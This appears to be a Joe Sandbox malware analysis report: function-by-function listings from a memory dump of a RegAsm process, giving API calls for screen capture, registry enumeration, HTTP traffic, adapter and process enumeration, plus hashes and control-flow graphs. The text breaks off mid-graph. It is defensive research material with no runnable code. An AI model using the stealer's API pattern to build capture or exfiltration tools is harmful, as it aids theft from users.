                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AvailableDataInternetQuery
                                                                      • String ID: *$*$J]T$K]T$K]T$Qcz$Qcz$S_(v$S_(v$[Q$[Q$[Q$\X$\X$`z5T$az5T$default$eA/,$eA/,$rIwhoU--Elvin$xG%$xk]S$xk]S$e_$e_
                                                                      • API String ID: 2430348039-3565328486
                                                                      • Opcode ID: 5412949fb933008e8f16a24fb50f8502612c2955992385c7e184ad1b056d7b36
                                                                      • Instruction ID: 484f0e800333bfa9e22fbc5c016a18b876618801a94856885b1b6ea040c3fd42
                                                                      • Opcode Fuzzy Hash: 5412949fb933008e8f16a24fb50f8502612c2955992385c7e184ad1b056d7b36
                                                                      • Instruction Fuzzy Hash: D613B770E002098BDF24DF68C9867BEB6B0FB58304F24551BF505EB3A1D7799A418B8B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040EB6B Relevance: 65.1, APIs: 16, Strings: 20, Instructions: 2054stringfilenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtCreateFile.NTDLL(?,00100001,?,?,00000000,00000000,00000007,00000001,00004021,00000000,00000000), ref: 0040F05D
                                                                      • lstrlenW.KERNEL32(00000ED3), ref: 0040F171
                                                                      • lstrcatW.KERNEL32(?,?), ref: 0040FF40
                                                                      • lstrcmpW.KERNEL32(00000000,?), ref: 00410358
                                                                      • lstrcmpW.KERNEL32(00000000,?), ref: 00410CF2
                                                                      • lstrcmpW.KERNEL32(00000000,?), ref: 00410D37
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmp$CreateFilelstrcatlstrlen
                                                                      • String ID: ,Q=$,Q=$5}L$5}L$D#b$D#b$jQnr-$p9lY$p9lY$p9lY$p9lY$y+B*$z+B*$z+B*$8U[$8U[$Wdb$]z6$]z6$]z6
                                                                      • API String ID: 4060627427-2906774030
                                                                      • Opcode ID: 961a2566ba273e6ba231deed209b154eed7df3662b54b2cc930da4d7fe5c4170
                                                                      • Instruction ID: 65774debdafe5111ceef73730a003ad0909a72d0d2bbecd448a284fbd20920da
                                                                      • Opcode Fuzzy Hash: 961a2566ba273e6ba231deed209b154eed7df3662b54b2cc930da4d7fe5c4170
                                                                      • Instruction Fuzzy Hash: 6EF2E8B0E012098BDF24CB59CA856BE77B1AB54310F24092BE506FB3D1D77999D1CB8B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0042FB78 Relevance: 46.6, APIs: 14, Strings: 12, Instructions: 1129memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32 ref: 0042FE33
                                                                      • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 004304FE
                                                                      • ReleaseDC.USER32 ref: 00430508
                                                                      • HeapAlloc.KERNEL32(00000000,00000000,?), ref: 0042FE39
                                                                        • Part of subcall function 00431294: GetSystemMetrics.USER32 ref: 00431325
                                                                        • Part of subcall function 00431294: CreateDCW.GDI32(?,00000000,00000000,00000000), ref: 00431388
                                                                        • Part of subcall function 00431294: GetSystemMetrics.USER32 ref: 004313FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HeapMetricsSystem$AllocBitsCreateProcessRelease
                                                                      • String ID: :1x$:1x$e)=$f)=$f)=$f)=$f)=$f)=$f)=$f)=$!F$$!F$
                                                                      • API String ID: 3040376304-592416677
                                                                      • Opcode ID: bb6898180dee1abdea941bbcf253aec547126e7f37d31fa2f000a6f0da5cd1f5
                                                                      • Instruction ID: d68b4f93653f734712ff7f5c30962399dce9cc81def5c8dd87dd17fc01db5794
                                                                      • Opcode Fuzzy Hash: bb6898180dee1abdea941bbcf253aec547126e7f37d31fa2f000a6f0da5cd1f5
                                                                      • Instruction Fuzzy Hash: E8A2E871E002198BDF24CF98D9656BEBBB5FB48304F64163BE005EB351D33899458F9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00432130 Relevance: 39.5, APIs: 11, Strings: 11, Instructions: 1027registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • wsprintfW.USER32 ref: 004321E8
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00432354
                                                                      • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020019,?,?,?,?,?,?,0042934A,?), ref: 004324FC
                                                                      • wsprintfW.USER32 ref: 004327EC
                                                                      • RegEnumKeyExW.KERNEL32 ref: 00432876
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00432EF3
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00432EF8
                                                                      • _strlen.LIBCMT ref: 00432F2F
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00432F49
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close$wsprintf$EnumOpen_strlen
                                                                      • String ID: BbA$?$Z-/M$[-/M$[-/M$_wJl$`wJl$`wJl$s^Xr$t^Xr$t^Xr
                                                                      • API String ID: 4237616888-3247521511
                                                                      • Opcode ID: ab8525394ccd318c760f46afa7d06232f35db9c3b9feb6d71739b52659e3b4de
                                                                      • Instruction ID: ecf74252d7c328f2710fa7a4ed189e72928217706fe12092d021441dd80da1dd
                                                                      • Opcode Fuzzy Hash: ab8525394ccd318c760f46afa7d06232f35db9c3b9feb6d71739b52659e3b4de
                                                                      • Instruction Fuzzy Hash: FD82E571D0410A9BDF289F98CE4667E76B0FB1C300F24652BE515EB394D7B98A418B8B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004118B6 Relevance: 29.7, APIs: 6, Strings: 10, Instructions: 1744stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrcatW.KERNEL32(778182B0,7B829D7E), ref: 00411E6B
                                                                      • lstrcatW.KERNEL32(778182B0,?), ref: 00412403
                                                                      • lstrcatW.KERNEL32(?,8410C221), ref: 0041333C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcat
                                                                      • String ID: !*2y$"*2y$D@D$D@D$Pc>2$Pc>2$vTT$|C?g$}C?g$}C?g
                                                                      • API String ID: 4038537762-1154530197
                                                                      • Opcode ID: 8fdd1ed8e5b778af510f68b91defb39f8f87b8bb22ab86dc7083df389a6e0ac0
                                                                      • Instruction ID: 27e6e9d45b57d3cee8e3eb274bf968d618a2379235462c408c449a921eceaa01
                                                                      • Opcode Fuzzy Hash: 8fdd1ed8e5b778af510f68b91defb39f8f87b8bb22ab86dc7083df389a6e0ac0
                                                                      • Instruction Fuzzy Hash: 03E2C871E016199BDF24EF98C981AFE7670AB05304F24451BE605EB3A0D3788AD1DBDB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041DE1F Relevance: 28.6, APIs: 9, Strings: 7, Instructions: 617COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Http$CloseHandle$OpenRequest$ConnectReceiveResponseSend_strlen
                                                                      • String ID: P$Qcz$Qcz$Qcz$TX$rX$xG%
                                                                      • API String ID: 3290223438-1430991242
                                                                      • Opcode ID: 344e4e375317b76dbdabc4b69f2e3f416e796e7f2dc9abd6bde1648fcfbcea9b
                                                                      • Instruction ID: d16d87c1f3a7754654c0616d20df139bbde8b0eb83fc76860f2b936885c04e04
                                                                      • Opcode Fuzzy Hash: 344e4e375317b76dbdabc4b69f2e3f416e796e7f2dc9abd6bde1648fcfbcea9b
                                                                      • Instruction Fuzzy Hash: AC429FB5D047098FDB14EF99C5886EEBBF0AB94300F14492BE815EB350D7788985CB8B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004090F8 Relevance: 27.4, APIs: 10, Strings: 5, Instructions: 1156libraryloaderprocessCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcAddress.KERNEL32(?,?), ref: 004093C6
                                                                      • GetModuleHandleW.KERNEL32(?), ref: 00409599
                                                                      • GetProcAddress.KERNEL32(?,?), ref: 004096FA
                                                                      • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0040A409
                                                                      • Process32FirstW.KERNEL32(?,?), ref: 0040A423
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$CreateFirstHandleModuleProcess32SnapshotToolhelp32
                                                                      • String ID: "*2y$"*2y$9$C@D$D@D
                                                                      • API String ID: 3265287541-2590425928
                                                                      • Opcode ID: d7888a6f0540df15007fd4160b7ba3035e11df803ac81f99cb91972441f3abd6
                                                                      • Instruction ID: 34b8d58beaa096617f5e474222152995c9015bdab263341ec297e93acded2113
                                                                      • Opcode Fuzzy Hash: d7888a6f0540df15007fd4160b7ba3035e11df803ac81f99cb91972441f3abd6
                                                                      • Instruction Fuzzy Hash: 1DA29174E0030A9BDF148B98D8869BE7BB0AB45304F64453BE515FB3E2D3788D518B9B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040D60C Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 905COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BbA$D$[-/M$[-/M$`wJl$`wJl$t^Xr
                                                                      • API String ID: 0-708496267
                                                                      • Opcode ID: 68b0cf2053630d96c6c7e9ae1dc0b31816f1100809514ed18577e2bdcb0c5012
                                                                      • Instruction ID: c58851619371432470393b983a7909cf4188d6597b0ba0081fda2667d935a13e
                                                                      • Opcode Fuzzy Hash: 68b0cf2053630d96c6c7e9ae1dc0b31816f1100809514ed18577e2bdcb0c5012
                                                                      • Instruction Fuzzy Hash: 307208B1D001098BDF24DB99C88567E7AB0AB54300F280D3BE515FB3D2D77ACA558B9B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040A878 Relevance: 21.7, APIs: 7, Strings: 5, Instructions: 734fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040AB31
                                                                      • CloseHandle.KERNEL32(?), ref: 0040AB3A
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0040ABC7
                                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0040ABE3
                                                                      • ExitProcess.KERNEL32 ref: 0040B522
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$CloseCreateExitHandleModuleNameProcessRead
                                                                      • String ID: 91x$:1x$e)=$f)=$f)=
                                                                      • API String ID: 1071776683-4185138681
                                                                      • Opcode ID: 428e4df45deb3a195276ab61222abbe9fc063120b6bdb81bb96080e113e47a04
                                                                      • Instruction ID: c2f796b02151e558e4cd2405a28089c1003d7c260324ffc2d6cd1f06cfe82e6b
                                                                      • Opcode Fuzzy Hash: 428e4df45deb3a195276ab61222abbe9fc063120b6bdb81bb96080e113e47a04
                                                                      • Instruction Fuzzy Hash: F55290719007018BDB389F19C59462A76E0EF14314768C93FE196EBBE1E73CE8568B4B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00421AC8 Relevance: 13.1, APIs: 2, Strings: 5, Instructions: 828COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetAdaptersInfo.IPHLPAPI(?,?), ref: 004226CF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AdaptersInfo
                                                                      • String ID: BbA$[-/M$[-/M$`wJl$`wJl
                                                                      • API String ID: 3177971545-1840906695
                                                                      • Opcode ID: de66aee730ffd3c215ff0d257bfd620dc9021a0f2271fca5b3861f45361d8d01
                                                                      • Instruction ID: 357383bcf4038bb756c9dd97774ee4b78dfcc2a21f2e836d74d6459984ec56c8
                                                                      • Opcode Fuzzy Hash: de66aee730ffd3c215ff0d257bfd620dc9021a0f2271fca5b3861f45361d8d01
                                                                      • Instruction Fuzzy Hash: 0762C870F002259BDF24DB98EAC267FB6B0AB14344FA4452BD512EB361D778D941CB8B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0042353E Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 883COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: W<$W<$EM%$U:$U:
                                                                      • API String ID: 0-3100889655
                                                                      • Opcode ID: 2acc81a196aef4ad8d5efe5f7b883e71b121b0c618f250bed290e11b345be0d2
                                                                      • Instruction ID: 25a5b04562af2c4b790086615b988222b414277d9acbe366002a3a0a7583ab3c
                                                                      • Opcode Fuzzy Hash: 2acc81a196aef4ad8d5efe5f7b883e71b121b0c618f250bed290e11b345be0d2
                                                                      • Instruction Fuzzy Hash: F86238B1F00229ABDF249E9CA84167EB670EB54701FA00517E519FB391D37C9F818B9B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00430EEA Relevance: 10.7, APIs: 7, Instructions: 157windowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 6737 430eea-430f0a 6738 430f0e-430f13 6737->6738 6739 430f15-430f1a 6738->6739 6740 430f6d-430f72 6738->6740 6741 430f20-430f25 6739->6741 6742 430fb7-430fbc 6739->6742 6743 431014-431019 6740->6743 6744 430f78-430f7d 6740->6744 6745 431034-431046 CreateCompatibleBitmap 6741->6745 6746 430f2b-430f30 6741->6746 6751 4310e2-431109 6742->6751 6752 430fc2-430fc7 6742->6752 6747 431119-43111e 6743->6747 6748 43101f-431024 6743->6748 6749 430f83-430f88 6744->6749 6750 43105f-431085 call 43114c call 42fb78 6744->6750 6745->6738 6756 430f36-430f3b 6746->6756 6757 43104b-43105a CreateCompatibleDC 6746->6757 6747->6738 6748->6738 6758 43102a-43102f 6748->6758 6760 43108a-4310dd SelectObject BitBlt SelectObject DeleteDC 6749->6760 6761 430f8e-430f93 6749->6761 6750->6738 6751->6738 6755 43110f-431114 6751->6755 6753 431123-431128 6752->6753 6754 430fcd-431000 call 4314f7 6752->6754 6753->6738 6764 43112e-43114b DeleteObject 6753->6764 6770 431002 6754->6770 6771 431007-43100f 6754->6771 6755->6738 6756->6738 6763 430f3d-430f64 call 431572 call 43114c 6756->6763 6757->6738 6758->6738 6760->6738 6761->6738 6766 430f99-430fb2 6761->6766 6763->6738 6776 430f66-430f6b 6763->6776 6766->6738 6770->6771 6771->6738 6776->6738
                                                                      APIs
                                                                      • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00431037
                                                                      • CreateCompatibleDC.GDI32(?), ref: 0043104C
                                                                      • SelectObject.GDI32(?,?), ref: 0043109C
                                                                      • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004310B7
                                                                      • SelectObject.GDI32(?,?), ref: 004310C5
                                                                      • DeleteDC.GDI32 ref: 004310D2
                                                                      • DeleteObject.GDI32(?), ref: 0043113A
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Object$CompatibleCreateDeleteSelect$Bitmap
                                                                      • String ID:
                                                                      • API String ID: 1142853709-0
                                                                      • Opcode ID: 91a93a37c38de53ea23a9c0a877a077755f0aaa02433f2fb45de1368452a670a
                                                                      • Instruction ID: b3fdffc199ab65b3733d76c9567b11c1eb2783c9ec3a81129b568f504c4985c9
                                                                      • Opcode Fuzzy Hash: 91a93a37c38de53ea23a9c0a877a077755f0aaa02433f2fb45de1368452a670a
                                                                      • Instruction Fuzzy Hash: B4514D319083046BDA305B58CC8452F76E5EB9D318F116A3BFA59E7770D279CC809B8B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040E568 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372filenativeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 6868 40e568-40e57e 6869 40e581-40e589 6868->6869 6870 40e5d5-40e5da 6869->6870 6871 40e58b-40e590 6869->6871 6872 40e5e0-40e5e5 6870->6872 6873 40e682-40e687 6870->6873 6874 40e596-40e59b 6871->6874 6875 40e618-40e61d 6871->6875 6876 40e707-40e70c 6872->6876 6877 40e5eb-40e5f0 6872->6877 6878 40e788-40e78d 6873->6878 6879 40e68d-40e692 6873->6879 6882 40e6d1-40e6d6 6874->6882 6883 40e5a1-40e5a6 6874->6883 6880 40e623-40e628 6875->6880 6881 40e734-40e739 6875->6881 6896 40e712-40e717 6876->6896 6897 40e988-40e9b2 6876->6897 6886 40e5f6-40e5fb 6877->6886 6887 40e7ee-40e7f3 6877->6887 6890 40e793-40e798 6878->6890 6891 40ea8a-40eac5 call 40d60c call 40e568 6878->6891 6888 40e698-40e69d 6879->6888 6889 40e8dc-40e900 6879->6889 6894 40e88e-40e8c5 call 40eb6b call 40eb3a 6880->6894 6895 40e62e-40e633 6880->6895 6884 40ea0e-40ea61 call 4409a0 call 410f80 call 43b928 6881->6884 6885 40e73f-40e744 6881->6885 6892 40e939-40e952 6882->6892 6893 40e6dc-40e6e1 6882->6893 6898 40e7c4-40e7c9 6883->6898 6899 40e5ac-40e5b1 6883->6899 6884->6869 6903 40ea66-40ea85 NtReadFile 6885->6903 6904 40e74a-40e74f 6885->6904 6907 40e601-40e606 6886->6907 6908 40e873-40e889 6886->6908 6915 40e7f9-40e809 6887->6915 6916 40eb1c-40eb21 6887->6916 6919 40e6a3-40e6a8 6888->6919 6920 40e90f-40e925 call 40eb3a * 2 6888->6920 6905 40e902 6889->6905 6906 40e907-40e90a 6889->6906 6909 40ead9-40eb06 call 40eb6b 6890->6909 6910 40e79e-40e7a3 6890->6910 6965 40eac7 6891->6965 6966 40eacc-40ead4 6891->6966 6892->6869 6922 40e957-40e97f 6893->6922 6923 40e6e7-40e6ec 6893->6923 6894->6869 6913 40e639-40e63e 6895->6913 6914 40e8ca-40e8da call 40d60c 6895->6914 6925 40e9c1-40ea09 call 4409a0 call 410f80 call 43b928 6896->6925 6926 40e71d-40e722 6896->6926 6917 40e9b4 6897->6917 6918 40e9b9-40e9bc 6897->6918 6911 40eb0b-40eb17 6898->6911 6912 40e7cf-40e7d4 6898->6912 6901 40e5b7-40e5bc 6899->6901 6902 40e80e-40e85c call 4409a0 call 410f80 call 43b928 call 44cb24 6899->6902 6901->6869 6936 40e5be-40e5d3 6901->6936 6981 40e861-40e86e 6902->6981 6903->6869 6904->6869 6928 40e755-40e778 6904->6928 6905->6906 6906->6869 6907->6869 6938 40e60c-40e613 6907->6938 6908->6869 6909->6869 6910->6869 6930 40e7a9-40e7bf 6910->6930 6911->6869 6912->6869 6931 40e7da-40e7e9 6912->6931 6913->6869 6939 40e644-40e647 call 40d60c 6913->6939 6960 40e92a-40e934 6914->6960 6915->6869 6916->6869 6932 40eb27-40eb39 6916->6932 6917->6918 6918->6869 6919->6869 6942 40e6ae-40e6cc 6919->6942 6920->6960 6922->6918 6940 40e981-40e986 6922->6940 6923->6869 6944 40e6f2-40e702 6923->6944 6925->6869 6926->6869 6945 40e728-40e72f 6926->6945 6928->6906 6948 40e77e-40e783 6928->6948 6930->6869 6931->6869 6936->6869 6938->6869 6962 40e64c-40e67d call 44bd43 call 44cb24 6939->6962 6940->6918 6942->6869 6944->6869 6945->6869 6948->6906 6960->6869 6962->6869 6965->6966 6966->6869 6981->6869
                                                                      APIs
                                                                      • NtReadFile.NTDLL(?,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0040EA7C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: )y$)y$=9$=9
                                                                      • API String ID: 2738559852-3900081360
                                                                      • Opcode ID: b62ac9012c6dbb90d36e0795c4f6f646ad1cb69db37553c556063bf5520f8dc1
                                                                      • Instruction ID: 72160566d51f1fbe540357022a01a48e756a4f683f43373904d48a77567efc0a
                                                                      • Opcode Fuzzy Hash: b62ac9012c6dbb90d36e0795c4f6f646ad1cb69db37553c556063bf5520f8dc1
                                                                      • Instruction Fuzzy Hash: D2D10CB1D01209ABDF149BDACE466AE7B70AB54304F240D37E505F73D1E37899628B8B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00458344 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116timeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 7522 458344-458374 call 457e8b call 457f15 call 457ee9 7529 458493-45849d call 452a87 7522->7529 7530 45837a-458386 call 457e91 7522->7530 7530->7529 7535 45838c-458398 call 457ebd 7530->7535 7535->7529 7538 45839e-4583bf call 4529a4 GetTimeZoneInformation 7535->7538 7541 4583c5-4583e5 7538->7541 7542 458470-458492 call 457e85 call 457e79 call 457e7f 7538->7542 7543 4583e7-4583ec 7541->7543 7544 4583ef-4583f7 7541->7544 7543->7544 7546 458409-45840b 7544->7546 7547 4583f9-458400 7544->7547 7550 45840d-45846d call 4414a0 * 4 call 455a58 call 458302 * 2 7546->7550 7547->7546 7549 458402-458407 7547->7549 7549->7550 7550->7542
                                                                      APIs
                                                                        • Part of subcall function 004529A4: RtlFreeHeap.NTDLL(00000000,00000000,?,00455CE1,?,00000000,?,?,00455BFD,?,00000007,?,?,00456339,?,?), ref: 004529BA
                                                                        • Part of subcall function 004529A4: GetLastError.KERNEL32(?,?,00455CE1,?,00000000,?,?,00455BFD,?,00000007,?,?,00456339,?,?), ref: 004529C5
                                                                      • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,004587D8,0041A797,?), ref: 004583B6
                                                                      Strings
                                                                      • W. Europe Standard Time, xrefs: 0045844F
                                                                      • W. Europe Daylight Time, xrefs: 00458463
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFreeHeapInformationLastTimeZone
                                                                      • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                      • API String ID: 3335090040-986674615
                                                                      • Opcode ID: 745e8091ca43396c5768c430505b44f6a1d466d0ebeac642c5bb0174e9299731
                                                                      • Instruction ID: b685551fd1686a2fb22fb6dba49427adb5c2dffbef7d1536a4bdec0201957d12
                                                                      • Opcode Fuzzy Hash: 745e8091ca43396c5768c430505b44f6a1d466d0ebeac642c5bb0174e9299731
                                                                      • Instruction Fuzzy Hash: E231D372901211EBCB10AF66DC4295F7B68AF01755B11807FFC08E7262EB789D458B98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0043E949 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0003EA73,0043E3C3), ref: 0043E94E
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 5e2fb61ac6d75a5f4229ec6f89e9841573719cdd5d8bbab4c92685ea8f0827a4
                                                                      • Instruction ID: 75304f21a955307eee70546b2b4ddbbcaf70fa27c0e1829879405b0b080d7e28
                                                                      • Opcode Fuzzy Hash: 5e2fb61ac6d75a5f4229ec6f89e9841573719cdd5d8bbab4c92685ea8f0827a4
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403E89 Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 492stringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 5911 403e89-403e9c 5912 403ea2-403eaa 5911->5912 5913 403efc-403f01 5912->5913 5914 403eac-403eb1 5912->5914 5917 403fb3-403fb8 5913->5917 5918 403f07-403f0c 5913->5918 5915 403f70-403f75 5914->5915 5916 403eb7-403ebc 5914->5916 5919 4040a8-4040ad 5915->5919 5920 403f7b-403f80 5915->5920 5921 403ec2-403ec7 5916->5921 5922 404013-404018 5916->5922 5923 404106-40410b 5917->5923 5924 403fbe-403fc3 5917->5924 5925 403f12-403f17 5918->5925 5926 404057-40405c 5918->5926 5939 4040b3-4040b8 5919->5939 5940 40429f-4042a4 5919->5940 5931 4041d0-4041d5 5920->5931 5932 403f86-403f8b 5920->5932 5933 40414a-40414f 5921->5933 5934 403ecd-403ed2 5921->5934 5927 404233-404238 5922->5927 5928 40401e-404023 5922->5928 5929 404111-404116 5923->5929 5930 4042db-4042e0 5923->5930 5937 404209-40420e 5924->5937 5938 403fc9-403fce 5924->5938 5941 40418d-404192 5925->5941 5942 403f1d-403f22 5925->5942 5935 404062-404067 5926->5935 5936 404255-40425a 5926->5936 5965 4045fc-40461c 5927->5965 5966 40423e-404243 5927->5966 5961 404400-404418 5928->5961 5962 404029-40402e 5928->5962 5947 4044a2-4044af 5929->5947 5948 40411c-404121 5929->5948 5949 404651-40468b call 408de0 lstrcatW * 2 5930->5949 5950 4042e6-4042eb 5930->5950 5959 4041db-4041e0 5931->5959 5960 40456c-4045ae call 408de0 lstrcatW * 2 5931->5960 5951 403f91-403f96 5932->5951 5952 404399-4043b2 call 44bd43 5932->5952 5953 404155-40415a 5933->5953 5954 4044dd-4044f5 5933->5954 5967 403ed8-403edd 5934->5967 5968 40430a-404324 call 4039e8 5934->5968 5969 40443b-404442 5935->5969 5970 40406d-404072 5935->5970 5971 404260-404265 5936->5971 5972 40462b-40463a 5936->5972 5963 404214-404219 